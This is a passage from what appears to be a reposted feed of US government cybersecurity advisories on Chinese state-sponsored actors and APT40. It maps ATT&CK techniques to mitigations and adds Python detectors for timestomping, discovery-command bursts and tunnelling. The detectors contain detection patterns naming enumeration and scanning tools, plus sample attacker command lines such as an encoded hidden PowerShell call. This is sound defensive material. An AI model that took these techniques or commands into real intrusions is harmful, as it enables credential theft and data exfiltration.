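(2) a file that a monitored process created and that later disappears is matched
    to the command line that deleted it, for correlation.

Added example, not code from the CISA advisory. The handle log, directory
snapshots and process events are constructed stand-ins for file-integrity and
EDR telemetry; field layouts are assumptions.
"""
from datetime import datetime, timedelta

# Command-line deletion functions to correlate with disappearing files.
DELETE_TOKENS = ("del ", "erase ", "rm ", "remove-item ", "sdelete")


def find_timestomped(handle_log, snapshot, tolerance=timedelta(seconds=1)):
    """handle_log: iterable of (path, opened_at, access) with access 'read'/'write'.
    snapshot: {path: {"mtime": datetime}} of the current attributes.
    A write handle opened later than the file's current mtime (beyond tolerance)
    means the mtime was set backwards after that write."""
    last_write = {}
    for path, opened_at, access in handle_log:
        if access == "write" and opened_at > last_write.get(path, datetime.min):
            last_write[path] = opened_at
    findings = []
    for path, attrs in snapshot.items():
        written = last_write.get(path)
        if written is not None and attrs["mtime"] + tolerance < written:
            findings.append({"path": path, "mtime": attrs["mtime"],
                             "last_write_handle": written,
                             "rule": "mtime predates last write handle (timestomping)"})
    return findings


def find_created_then_deleted(process_events, snapshot_before, snapshot_after):
    """process_events: iterable of (ts, image, cmdline, created_paths).
    Files present in snapshot_before but missing from snapshot_after are matched
    to a deletion command naming them and to the process that created them."""
    creators = {}
    deletions = []
    for ts, image, cmdline, created in process_events:
        for path in created:
            creators[path.lower()] = image
        # Substring matching is deliberately simple; production rules should tokenize.
        if any(tok in cmdline.lower() for tok in DELETE_TOKENS):
            deletions.append((ts, image, cmdline))
    findings = []
    for path in sorted(set(snapshot_before) - set(snapshot_after)):
        hits = [d for d in deletions if path.lower() in d[2].lower()]
        if hits:
            findings.append({"path": path, "deleted_by": hits[0][2],
                             "created_by": creators.get(path.lower(), "unknown")})
    return findings


# Constructed sample telemetry (not real data).
T0 = datetime(2021, 7, 19, 9, 0, 0)
HANDLE_LOG = [
    (r"C:\Windows\Temp\svc.dll", T0 + timedelta(minutes=5), "write"),
    (r"C:\Windows\Temp\svc.dll", T0 + timedelta(minutes=6), "read"),
    (r"C:\Users\Public\notes.txt", T0 + timedelta(minutes=2), "write"),
    (r"C:\Windows\Temp\mt.exe", T0 + timedelta(minutes=7), "write"),
]
SNAPSHOT_BEFORE = {
    # mtime rolled back to 2018 although a write handle was opened at T0+5min.
    r"C:\Windows\Temp\svc.dll": {"mtime": datetime(2018, 3, 1, 12, 0, 0)},
    r"C:\Users\Public\notes.txt": {"mtime": T0 + timedelta(minutes=2, seconds=1)},
    r"C:\Windows\Temp\mt.exe": {"mtime": T0 + timedelta(minutes=7)},
}
# Later snapshot: mt.exe is gone.
SNAPSHOT_AFTER = {p: a for p, a in SNAPSHOT_BEFORE.items() if not p.endswith("mt.exe")}
PROCESS_EVENTS = [
    (T0 + timedelta(minutes=7), "cmd.exe",
     r"copy \\fs01\share\mt.exe C:\Windows\Temp\mt.exe", [r"C:\Windows\Temp\mt.exe"]),
    (T0 + timedelta(minutes=40), "cmd.exe", r"del /f C:\Windows\Temp\mt.exe", []),
]

if __name__ == "__main__":
    for finding in find_timestomped(HANDLE_LOG, SNAPSHOT_BEFORE):
        print(finding)
    for finding in find_created_then_deleted(PROCESS_EVENTS, SNAPSHOT_BEFORE, SNAPSHOT_AFTER):
        print(finding)
```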
        Defensive tactics and techniques: Detect: Process Analysis: File Access Pattern Analysis [D3-FAPA], Process Spawn Analysis [D3-PSA]

    Tactics: Credential Access [TA0006]

    Table VIII: Chinese state-sponsored cyber actors’ Credential Access TTPs with detection and mitigation recommendations
    Columns: Threat Actor Technique / Sub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques

    Exploitation for Credential Access [T1212]
        Threat actor procedure(s): Chinese state-sponsored cyber actors have been observed exploiting Pulse Secure VPN appliances to view and extract valid user credentials and network information from the servers.
        Detection and mitigation recommendations: Update and patch software regularly. Use cyber threat intelligence and open-source reporting to determine vulnerabilities that threat actors may be actively targeting and exploiting; patch those vulnerabilities immediately.
        Defensive tactics and techniques: Harden: Platform Hardening: Software Update [D3-SU]; Credential Hardening: Multi-factor Authentication [D3-MFA]

    OS Credential Dumping [T1003]: LSASS Memory [T1003.001], NTDS [T1003.003]
        Threat actor procedure(s): Chinese state-sponsored cyber actors were observed targeting the LSASS process or the Active Directory database (NTDS.DIT) for credential dumping.
        Detection and mitigation recommendations: Monitor process and command-line arguments for program execution that may be indicative of credential dumping, especially attempts to access or copy NTDS.DIT. Ensure that local administrator accounts have complex, unique passwords across all systems on the network. Limit credential overlap across accounts and systems by training users and administrators not to use the same passwords for multiple accounts. Consider disabling or restricting NTLM. Consider disabling WDigest authentication. Ensure that domain controllers are backed up and properly secured (e.g., encrypt backups). Implement Credential Guard to protect the LSA secrets from credential dumping on Windows 10. This is not configured by default and has hardware and firmware system requirements.
        Enable Protected Process Light for LSA on Windows 8.1 and Windows Server 2012 R2.
        Defensive tactics and techniques: Harden: Credential Hardening [D3-CH]; Detect: Process Analysis: File Access Pattern Analysis [D3-FAPA], System Call Analysis [D3-SCA]; Isolate: Execution Isolation: Hardware-based Process Isolation [D3-HBPI], Mandatory Access Control [D3-MAC]

    Tactics: Discovery [TA0007]

    Table IX: Chinese state-sponsored cyber actors’ Discovery TTPs with detection and mitigation recommendations
    Columns: Threat Actor Technique / Sub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques

    File and Directory Discovery [T1083]
        Threat actor procedure(s): Chinese state-sponsored cyber actors have been observed using multiple implants with file system enumeration and traversal capabilities.
        Detection and mitigation recommendations: Monitor processes and command-line arguments for actions that could be taken to gather system and network information. WMI and PowerShell should also be monitored.
        Defensive tactics and techniques: Detect: User Behavior Analysis: Job Function Access Pattern Analysis [D3-JFAPA]; Process Analysis: Database Query String Analysis [D3-DQSA], File Access Pattern Analysis [D3-FAPA], Process Spawn Analysis [D3-PSA]

    Permission Group Discovery [T1069]
        Threat actor procedure(s): Chinese state-sponsored cyber actors have been observed using commands, including net group and net localgroup, to enumerate the different user groups on the target network.
        Detection and mitigation recommendations: Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.
        Defensive tactics and techniques: Detect: Process Analysis: Process Spawn Analysis [D3-PSA], System Call Analysis [D3-SCA]; User Behavior Analysis [D3-UBA]

    Process Discovery [T1057]
        Threat actor procedure(s): Chinese state-sponsored cyber actors have been observed using commands, including tasklist, jobs, ps, or taskmgr, to reveal the running processes on victim devices.
        Detection and mitigation recommendations: Normal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.
        Defensive tactics and techniques: Detect: Process Analysis: Process Spawn Analysis [D3-PSA], System Call Analysis [D3-SCA]; User Behavior Analysis [D3-UBA]

    Network Service Scanning [T1046]
        Threat actor procedure(s): Chinese state-sponsored cyber actors have been observed using Nbtscan and nmap to scan and enumerate target network information.
        Detection and mitigation recommendations:
        • Ensure that unnecessary ports and services are closed to prevent discovery and potential exploitation.
        • Use network intrusion detection and prevention systems to detect and prevent remote service scans such as Nbtscan or nmap.
        • Ensure proper network segmentation is followed to protect critical servers and devices to help mitigate potential exploitation.
        Defensive tactics and techniques: Detect: Network Traffic Analysis: Connection Attempt Analysis [D3-CAA]; Isolate: Network Isolation: Inbound Traffic Filtering [D3-ITF]

    Remote System Discovery [T1018]
        Threat actor procedure(s): Chinese state-sponsored cyber actors have been observed using Base64-encoded commands, including ping, net group, and net user, to enumerate target network information.
        Detection and mitigation recommendations: Monitor for processes that can be used to discover remote systems, such as ping.exe and tracert.exe, especially when executed in quick succession.
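The Discovery rows above (net group / net localgroup, tasklist and ps, Nbtscan and nmap, and Base64-encoded ping and net commands run in quick succession) share one detection shape: several discovery commands from one account in a short window. The following added example, not code from the CISA advisory, implements that burst rule over process-creation records, decoding PowerShell -EncodedCommand arguments first; the record layout, thresholds and sample events are constructed assumptions.

```python
"""Flag a burst of discovery commands from one account on one host, including
commands hidden inside a PowerShell -EncodedCommand (UTF-16LE base64) argument,
which the advisory reports being used for ping, net group and net user.

Added example, not code from the CISA advisory. The process-creation records
are a constructed stand-in for Sysmon Event ID 1 / Security 4688 telemetry;
thresholds and field names are assumptions.
"""
import base64
import re
from collections import defaultdict

# Discovery commands named in the advisory's Discovery table (Table IX).
DISCOVERY_PATTERNS = [
    (re.compile(r"\bnet1?(\.exe)?\s+(group|localgroup|user|view)\b", re.I), "T1069/T1018 net enumeration"),
    (re.compile(r"\b(tasklist|taskmgr|ps|jobs)\b", re.I), "T1057 process discovery"),
    (re.compile(r"\b(ping|tracert)(\.exe)?\b", re.I), "T1018 remote system discovery"),
    (re.compile(r"\b(nbtscan|nmap)\b", re.I), "T1046 network service scanning"),
]
# PowerShell accepts -e, -ec, -enc and -EncodedCommand for the base64 argument.
ENCODED_FLAG = re.compile(r"-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def expand_encoded(cmdline):
    """Append the decoded -EncodedCommand payload (if any) so the discovery
    patterns can match the real command rather than its base64 form."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(2)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline
    return f"{cmdline} [decoded: {decoded}]"


def classify(cmdline):
    """Return the technique labels whose patterns match the command line."""
    text = expand_encoded(cmdline)
    return [label for pattern, label in DISCOVERY_PATTERNS if pattern.search(text)]


def find_discovery_bursts(events, window_seconds=120, min_commands=4):
    """events: iterable of {ts, user, host, cmdline}. Alert when one user on one
    host runs at least min_commands discovery commands within window_seconds."""
    per_actor = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        labels = classify(ev["cmdline"])
        if labels:
            per_actor[(ev["user"], ev["host"])].append((ev["ts"], ev["cmdline"], labels))
    alerts = []
    for (user, host), hits in per_actor.items():
        start = 0
        for end in range(len(hits)):
            while hits[end][0] - hits[start][0] > window_seconds:
                start += 1  # slide the window forward
            if end - start + 1 >= min_commands:
                burst = hits[start:end + 1]
                alerts.append({"user": user, "host": host,
                               "commands": [h[1] for h in burst],
                               "techniques": sorted({lbl for h in burst for lbl in h[2]})})
                break  # one alert per actor is enough for triage
    return alerts


def encoded_arg(ps_command):
    """Build a PowerShell -EncodedCommand argument (used only to construct sample input)."""
    return base64.b64encode(ps_command.encode("utf-16-le")).decode()


def _ev(ts, user, host, cmdline):
    return {"ts": ts, "user": user, "host": host, "cmdline": cmdline}


# Constructed sample telemetry (not real data).
SAMPLE_EVENTS = [
    _ev(0, r"CORP\svc_backup", "FS01", 'net group "Domain Admins" /domain'),
    _ev(5, r"CORP\svc_backup", "FS01", "net localgroup administrators"),
    _ev(9, r"CORP\svc_backup", "FS01", "tasklist /v"),
    _ev(20, r"CORP\svc_backup", "FS01", "powershell.exe -nop -w hidden -enc " + encoded_arg("net user /domain")),
    _ev(31, r"CORP\svc_backup", "FS01", "ping -n 1 10.0.0.5"),
    _ev(33, r"CORP\svc_backup", "FS01", "ping -n 1 10.0.0.6"),
    # An administrator checking one process list is not a burst.
    _ev(40, r"CORP\jdoe", "WS17", "tasklist"),
    _ev(41, r"CORP\jdoe", "WS17", "notepad.exe report.txt"),
]

if __name__ == "__main__":
    for alert in find_discovery_bursts(SAMPLE_EVENTS):
        print(alert)
```

Service accounts and help-desk staff legitimately run some of these commands, so the per-actor threshold should be set from a baseline of normal job functions rather than a fixed number.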
        Defensive tactics and techniques: Detect: Process Analysis: Process Spawn Analysis [D3-PSA]; User Behavior Analysis: Job Function Access Pattern Analysis [D3-JFAPA]

    Tactics: Lateral Movement [TA0008]

    Table X: Chinese state-sponsored cyber actors’ Lateral Movement TTPs with detection and mitigation recommendations
    Columns: Threat Actor Technique / Sub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques

    Exploitation of Remote Services [T1210]
        Threat actor procedure(s): Chinese state-sponsored cyber actors used valid accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, RDP, and Virtual Network Computing (VNC). The actor may then perform actions as the logged-on user. Chinese state-sponsored cyber actors also used on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments in order to pivot to cloud resources.
        Detection and mitigation recommendations: Disable or remove unnecessary services. Minimize permissions and access for service accounts. Perform vulnerability scanning and update software regularly. Use threat intelligence and open-source exploitation databases to determine services that are targets for exploitation.
        Defensive tactics and techniques: Detect: Network Traffic Analysis: Remote Terminal Session Detection [D3-RTSD]; User Behavior Analysis [D3-UBA]; Isolate: Execution Isolation: Mandatory Access Control [D3-MAC]

    Tactics: Collection [TA0009]

    Table XI: Chinese state-sponsored cyber actors’ Collection TTPs with detection and mitigation recommendations
    Columns: Threat Actor Technique / Sub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques

    Archive Collected Data [T1560]
        Threat actor procedure(s): Chinese state-sponsored cyber actors compressed and encrypted exfiltration files into RAR archives and subsequently used cloud storage services to store them.
        Detection and mitigation recommendations: Scan systems to identify unauthorized archival utilities or methods unusual for the environment. Monitor command-line arguments for known archival utilities that are not common in the organization's environment.
        Defensive tactics and techniques: Detect: Process Analysis: File Access Pattern Analysis [D3-FAPA], Process Spawn Analysis [D3-PSA]; Isolate: Execution Isolation: Executable Denylisting [D3-EDL]

    Clipboard Data [T1115]
        Threat actor procedure(s): Chinese state-sponsored cyber actors used RDP and executed rdpclip.exe to exfiltrate information from the clipboard.
        Detection and mitigation recommendations: Access to the clipboard is a legitimate function of many applications on an operating system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity (e.g., excessive use of pbcopy/pbpaste (Linux) or clip.exe (Windows) run by general users through the command line). If possible, disable use of RDP and other file sharing protocols to minimize a malicious actor's ability to exfiltrate data.
        Defensive tactics and techniques: Detect: Network Traffic Analysis: Remote Terminal Session Detection [D3-RTSD]; Isolate: Network Isolation: Inbound Traffic Filtering [D3-ITF], Outbound Traffic Filtering [D3-OTF]

    Data Staged [T1074]
        Threat actor procedure(s): Chinese state-sponsored cyber actors have been observed using the mv command to move files into a staging location, such as a compromised Microsoft Exchange or IIS server or an emplaced webshell, prior to compressing and exfiltrating the data from the target network.
        Detection and mitigation recommendations: Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as using 7-Zip, RAR, ZIP, or zlib. Monitor publicly writable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
        Defensive tactics and techniques: Detect: Process Analysis: File Access Pattern Analysis [D3-FAPA]

    Email Collection [T1114]
        Threat actor procedure(s): Chinese state-sponsored cyber actors have been observed using the New-MailboxExportRequest PowerShell cmdlet to export target mailboxes.
        Detection and mitigation recommendations: Audit email auto-forwarding rules for suspicious or unrecognized rulesets. Encrypt email using public key cryptography, where feasible. Use MFA on public-facing mail servers.
        Defensive tactics and techniques: Harden: Credential Hardening: Multi-factor Authentication [D3-MFA]; Message Hardening: Message Encryption [D3-MENCR]; Detect: Process Analysis [D3-PA]

    Tactics: Command and Control [TA0011]

    Table XII: Chinese state-sponsored cyber actors’ Command and Control TTPs with detection and mitigation recommendations
    Columns: Threat Actor Technique / Sub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques

    Application Layer Protocol [T1071]
        Threat actor procedure(s): Chinese state-sponsored cyber actors have been observed:
        • Using commercial cloud storage services for command and control.
        • Using malware implants that use the Dropbox® API for C2 and a downloader that downloads and executes a payload using the Microsoft OneDrive® API.
        Detection and mitigation recommendations: Use network intrusion detection and prevention systems with network signatures to identify traffic for specific adversary malware.
        Defensive tactics and techniques: Detect: Network Traffic Analysis: Client-server Payload Profiling [D3-CSPP], File Carving [D3-FC]; Isolate: Network Isolation: DNS Denylisting [D3-DNSDL]

    Ingress Tool Transfer [T1105]
        Threat actor procedure(s): Chinese state-sponsored cyber actors have been observed importing tools from GitHub or infected domains to victim networks. In some instances, Chinese state-sponsored cyber actors used the Server Message Block (SMB) protocol to import tools into victim networks.
        Detection and mitigation recommendations: Perform ingress traffic analysis to identify transmissions that are outside of normal network behavior. Do not expose services and protocols (such as File Transfer Protocol [FTP]) to the Internet without strong business justification. Use signature-based network intrusion detection and prevention systems to identify adversary malware coming into the network.
        Defensive tactics and techniques: Isolate: Network Isolation: Inbound Traffic Filtering [D3-ITF]

    Non-Standard Port [T1571]
        Threat actor procedure(s): Chinese state-sponsored cyber actors have been observed using a non-standard SSH port to establish covert communication channels with VPS infrastructure.
        Detection and mitigation recommendations: Use signature-based network intrusion detection and prevention systems to identify adversary malware calling back to C2. Configure firewalls to limit outgoing traffic to only the ports required by the functions of that network segment. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port.
        Defensive tactics and techniques: Detect: Network Traffic Analysis: Client-server Payload Profiling [D3-CSPP], Protocol Metadata Anomaly Detection [D3-PMAD]; Isolate: Network Isolation: Inbound Traffic Filtering [D3-ITF], Outbound Traffic Filtering [D3-OTF]

    Protocol Tunneling [T1572]
        Threat actor procedure(s): Chinese state-sponsored cyber actors have been observed using tools like dog-tunnel and dns2tcp.exe to conceal C2 traffic within existing network activity.
        Detection and mitigation recommendations: Monitor systems for connections using ports/protocols commonly associated with tunneling, such as SSH (port 22). Also monitor for processes commonly associated with tunneling, such as Plink and the OpenSSH client. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server).
        Defensive tactics and techniques: Detect: Network Traffic Analysis: Protocol Metadata Anomaly Detection [D3-PMAD]

    Proxy [T1090]: Multi-Hop Proxy [T1090.003]
        Threat actor procedure(s): Chinese state-sponsored cyber actors have been observed using a network of VPSs and small office and home office (SOHO) routers as part of their operational infrastructure to evade detection and host C2 activity. Some of these nodes operate as part of an encrypted proxy service to prevent attribution by concealing their country of origin and TTPs.
        Detection and mitigation recommendations: Monitor traffic for encrypted communications originating from potentially breached routers to other routers within the organization. Compare the source and destination with the configuration of the device to determine whether these channels are authorized VPN connections or other encrypted modes of communication. Alert on traffic to known anonymity networks (such as Tor) or known adversary infrastructure that uses this technique. Use network allowlists and blocklists to block traffic to known anonymity networks and C2 infrastructure.
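The packet-content and data-flow checks recommended in the Non-Standard Port and Protocol Tunneling rows above, as an added example that is not code from the CISA advisory: an SSH banner on a port other than 22, traffic on a well-known port whose first bytes do not look like that port's protocol, and a client sending far more than it receives. The flow records, their field names and the thresholds are constructed assumptions standing in for NetFlow/Zeek-style data.

```python
"""Three checks from the advisory's Non-Standard Port and Protocol Tunneling
guidance, run over flow records that carry the first client payload bytes:
(1) an SSH banner on a port other than 22 (T1571);
(2) traffic on a well-known port whose first bytes do not look like that port's
    protocol (a tunnel wearing a familiar port);
(3) a client sending far more than it receives (tunneling or staging for
    exfiltration, T1572).

Added example, not code from the CISA advisory. The flow records are a
constructed stand-in for NetFlow/Zeek-style data; thresholds are assumptions.
"""

# How the first client bytes should look on well-known ports.
EXPECTED_PROTOCOL = {
    22: lambda p: p.startswith(b"SSH-"),
    80: lambda p: p.split(b" ", 1)[0] in {b"GET", b"POST", b"HEAD", b"PUT", b"OPTIONS", b"DELETE"},
    # TLS record: content type 0x16 (handshake) followed by a TLS 1.x record version.
    443: lambda p: p[:1] == b"\x16" and p[1:3] in {b"\x03\x01", b"\x03\x02", b"\x03\x03"},
}


def analyze_flow(flow, upload_ratio=10.0, min_upload_bytes=1_000_000):
    """flow: {"dst_port": int, "client_payload": bytes, "client_bytes": int, "server_bytes": int}.
    Returns a list of (rule, detail) findings; an empty list means nothing flagged."""
    findings = []
    port, payload = flow["dst_port"], flow["client_payload"]
    if payload.startswith(b"SSH-") and port != 22:
        findings.append(("T1571 non-standard port", f"SSH banner seen on tcp/{port}"))
    check = EXPECTED_PROTOCOL.get(port)
    if check is not None and payload and not check(payload):
        findings.append(("protocol mismatch", f"tcp/{port} payload does not start like the expected protocol"))
    up, down = flow["client_bytes"], flow["server_bytes"]
    if up >= min_upload_bytes and up > upload_ratio * max(down, 1):
        findings.append(("T1572 lopsided flow", f"client sent {up} bytes but received only {down}"))
    return findings


def analyze_flows(flows):
    """Return (src, dst, dst_port, findings) for every flow with at least one finding."""
    flagged = []
    for flow in flows:
        findings = analyze_flow(flow)
        if findings:
            flagged.append((flow["src"], flow["dst"], flow["dst_port"], findings))
    return flagged


def _flow(src, dst, dst_port, client_payload, client_bytes, server_bytes):
    return {"src": src, "dst": dst, "dst_port": dst_port, "client_payload": client_payload,
            "client_bytes": client_bytes, "server_bytes": server_bytes}


# Constructed sample flows (documentation address ranges, not real traffic).
SAMPLE_FLOWS = [
    # Ordinary HTTPS browsing: TLS ClientHello, mostly downloads.
    _flow("10.0.0.15", "203.0.113.10", 443, b"\x16\x03\x01\x02\x00\x01\x00", 4_200, 180_000),
    # SSH to a VPS on tcp/8443 with tens of megabytes going out and little coming back.
    _flow("10.0.0.15", "198.51.100.77", 8443, b"SSH-2.0-OpenSSH_7.4\r\n", 52_000_000, 900_000),
    # Something that is not SSH talking on tcp/22.
    _flow("10.0.0.22", "198.51.100.9", 22, b"GET / HTTP/1.1\r\nHost: x\r\n", 3_000, 1_500),
    # Legitimate administrative SSH to an internal host.
    _flow("10.0.0.5", "10.0.1.30", 22, b"SSH-2.0-OpenSSH_8.2\r\n", 40_000, 60_000),
]

if __name__ == "__main__":
    for src, dst, port, findings in analyze_flows(SAMPLE_FLOWS):
        print(f"{src} -> {dst}:{port}")
        for rule, detail in findings:
            print(f"  {rule}: {detail}")
```

Backup jobs and cloud sync clients also produce lopsided upload flows, so the ratio rule is best scoped to segments where large outbound transfers are not expected.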
        Defensive tactics and techniques: Detect: Network Traffic Analysis: Protocol Metadata Anomaly Detection [D3-PMAD], Relay Pattern Analysis [D3-RPA]; Isolate: Network Isolation: Outbound Traffic Filtering [D3-OTF]

    Appendix B: MITRE ATT&CK Framework

    Figure 2: MITRE ATT&CK Enterprise tactics and techniques used by Chinese state-sponsored cyber actors (Click here for the downloadable JSON file.)

    Contact Information

    To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at www.fbi.gov/contact-us/field, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at Central@cisa.dhs.gov. For NSA client requirements or general cybersecurity inquiries, contact the NSA Cybersecurity Requirements Center at 410-854-4200 or Cybersecurity_Requests@nsa.gov.

    Media Inquiries / Press Desk:
        • NSA Media Relations, 443-634-0721, MediaRelations@nsa.gov
        • CISA Media Relations, 703-235-2010, CISAMedia@cisa.dhs.gov
        • FBI National Press Office, 202-324-3691, npo@fbi.gov

    References
    [1] FireEye: This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits

    Revisions
    July 19, 2021: Initial Version

    This product is provided subject to this Notification and this Privacy & Use policy.

  • AA21-200A: Tactics, Techniques, and Procedures of Indicted APT40 Actors Associated with China’s MSS Hainan State Security Department
    by CISA on 19 Luglio 2021 at 11:00 am

    Original release date: July 19, 2021 | Last revised: July 20, 2021

    Summary

    This Joint Cybersecurity Advisory was written by the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) to provide information on a Chinese Advanced Persistent Threat (APT) group known in open-source reporting as APT40. This advisory provides APT40’s tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help cybersecurity practitioners identify and remediate APT40 intrusions and established footholds.

    APT40—aka BRONZE MOHAWK, FEVERDREAM, G0065, Gadolinium, GreenCrash, Hellsing, Kryptonite Panda, Leviathan, MUDCARP, Periscope, Temp.Periscope, and Temp.Jumper—is located in Haikou, Hainan Province, People’s Republic of China (PRC), and has been active since at least 2009. APT40 has targeted governmental organizations, companies, and universities in a wide range of industries—including biomedical, robotics, and maritime research—across the United States, Canada, Europe, the Middle East, and the South China Sea area, as well as industries included in China’s Belt and Road Initiative.

    On July 19, 2021, the U.S. Department of Justice (DOJ) unsealed an indictment against four APT40 cyber actors for their illicit computer network exploitation (CNE) activities via front company Hainan Xiandun Technology Development Company (Hainan Xiandun). Hainan Xiandun employee Wu Shurong cooperated with and carried out orders from PRC Ministry of State Security (MSS) Hainan State Security Department (HSSD) intelligence officers Ding Xiaoyang, Zhu Yunmin, and Cheng Qingmin to conduct CNE. Wu’s CNE activities resulted in the theft of trade secrets, intellectual property, and other high-value information from companies and organizations in the United States and abroad, as well as from multiple foreign governments.
    These MSS-affiliated actors targeted victims in the following industries: academia, aerospace/aviation, biomedical, defense industrial base, education, government, healthcare, manufacturing, maritime, research institutes, and transportation (rail and shipping).

    Click here for a PDF version of this report. (Updated July 19, 2021)
    Click here for indicators of compromise (IOCs) in STIX format.

    Note: to uncover malicious activity, incident responders search for IOCs in network- and host-based artifacts and assess the results—eliminating false positives during the assessment. For example, some MD5 IOCs in the STIX file identify legitimate tools—such as PuTTY, cmd.exe, svchost.exe, etc.—as indicators of compromise. Although the tools themselves are not malicious, APT40 attackers placed and used them from non-standard folders on victim systems during computer intrusion activity. If a legitimate tool is identified by an incident responder, then the location of the tool should be assessed to eliminate false positives or to uncover malicious activity. See Technical Approaches to Uncovering and Remediating Malicious Activity for more incident handling guidance.

    Technical Details

    This Joint Cybersecurity Advisory uses the MITRE ATT&CK® framework, version 9. See the ATT&CK for Enterprise framework for all referenced threat actor tactics and techniques. APT40 [G0065] has used a variety of tactics and techniques and a large library of custom and open-source malware—much of which is shared with multiple other suspected Chinese groups—to establish initial access via user and administrator credentials, enable lateral movement once inside the network, and locate high-value assets in order to exfiltrate data. Table 1 provides details on these tactics and techniques. Note: see the appendix for a list of the domains, file names, and malware MD5 hash values used to facilitate this activity.
    Table 1: APT40 ATT&CK Tactics and Techniques
    Columns: Tactics | Activities and Techniques

    Reconnaissance [TA0043] and Resource Development [TA0042]
        • Gathered victim identity information [T1589] by collecting compromised credentials [T1589.001]
        • Acquired infrastructure [T1583] to establish domains that impersonate legitimate entities [T1583.001], aka ‘typosquatting’, to use in watering hole attacks and as command and control (C2) [TA0011] infrastructure
        • Established new [T1585.002] and compromised existing [T1586.002] email and social media accounts [T1585.001] to conduct social engineering attacks

    Initial Access [TA0001]
        • External remote services (e.g., virtual private network [VPN] services) [T1133]
        • Spearphishing emails with malicious attachments [T1566.001] and links [T1566.002]
        • Drive-by compromises [T1189] and exploitation of public-facing applications [T1190]
        • Access to valid [T1078], compromised administrative [T1078.001] accounts

    Execution [TA0002]
        • Command and scripting interpreters [T1059] such as PowerShell [T1059.001]
        • Exploitation of software vulnerabilities in client applications to execute code [T1203], using lure documents that dropped malware exploiting various Common Vulnerabilities and Exposures (CVEs)
        • User execution [T1204] of malicious files [T1204.002] and links [T1566.002] attached to spearphishing emails [T1566.001]

    Persistence [TA0003], Privilege Escalation [TA0004], Credential Access [TA0006], Discovery [TA0007], and Lateral Movement [TA0008]
        APT40 has used a combination of tool frameworks and malware to establish persistence, escalate privileges, map, and move laterally on victim networks. Additionally, APT40 conducted internal spearphishing attacks [T1534]. Tools and malware used:
        • BADFLICK/Greencrash
        • China Chopper [S0020]
        • Cobalt Strike [S0154]
        • Derusbi/PHOTO [S0021]
        • Gh0stRAT [S0032]
        • GreenRAT
        • jjdoor/Transporter
        • jumpkick
        • Murkytop (mt.exe) [S0233]
        • NanHaiShu [S0228]
        • Orz/AirBreak [S0229]
        • PowerShell Empire [S0363]
        • PowerSploit [S0194]
        • Server software component: Web Shell [T1505.003]

    Defense Evasion [TA0005], Command and Control [TA0011], Collection [TA0009], and Exfiltration [TA0010]
        • Use of steganography [T1027.003] to hide stolen data inside other files stored on GitHub
        • Protocol impersonation [T1001.003] by using Application Programming Interface (API) keys for Dropbox accounts in commands to upload stolen data, to make it appear that the activity was a legitimate use of the Dropbox service
        • Protocol tunneling [T1572] and multi-hop proxies [T1090.003], including the use of Tor [S0183]
        • Use of domain typosquatting for C2 infrastructure [T1583.001]
        • Archive [T1560], encrypt [T1532], and stage collected data locally [T1074.001] and remotely [T1074.002] for exfiltration
        • Exfiltration over C2 channel [T1041]

    Mitigations

    Network Defense-in-Depth

    Proper network defense-in-depth and adherence to information security best practices can assist in mitigating the threat and reducing the risk. The following guidance may assist organizations in developing network defense procedures.

    Patch and Vulnerability Management
        • Install vendor-provided and verified patches on all systems for critical vulnerabilities, prioritizing timely patching of internet-connected servers and software processing internet data—such as web browsers, browser plugins, and document readers.
        • Ensure proper mitigating steps or compensating controls are implemented for vulnerabilities that cannot be patched in a timely manner.
        • Maintain up-to-date antivirus signatures and engines.
        • Routinely audit configuration and patch management programs to ensure the ability to track and mitigate emerging threats.
        • Implementing a rigorous configuration and patch management program will hamper sophisticated cyber threat actors’ operations and protect resources and information systems.
        • Review the articles in the References section for more information on Chinese APT exploitation of common vulnerabilities.

    Protect Credentials
        • Strengthen credential requirements, regularly change passwords, and implement multi-factor authentication to protect individual accounts, particularly for webmail and VPN access and for accounts that access critical systems. Do not reuse passwords for multiple accounts.
        • Audit all remote authentications from trusted networks or service providers.
        • Detect mismatches by correlating credentials used within internal networks with those employed on external-facing systems.
        • Log use of system administrator commands such as net, ipconfig, and ping.
        • Enforce the principle of least privilege.

    Network Hygiene and Monitoring
        • Actively scan and monitor internet-accessible applications for unauthorized access, modification, and anomalous activities.
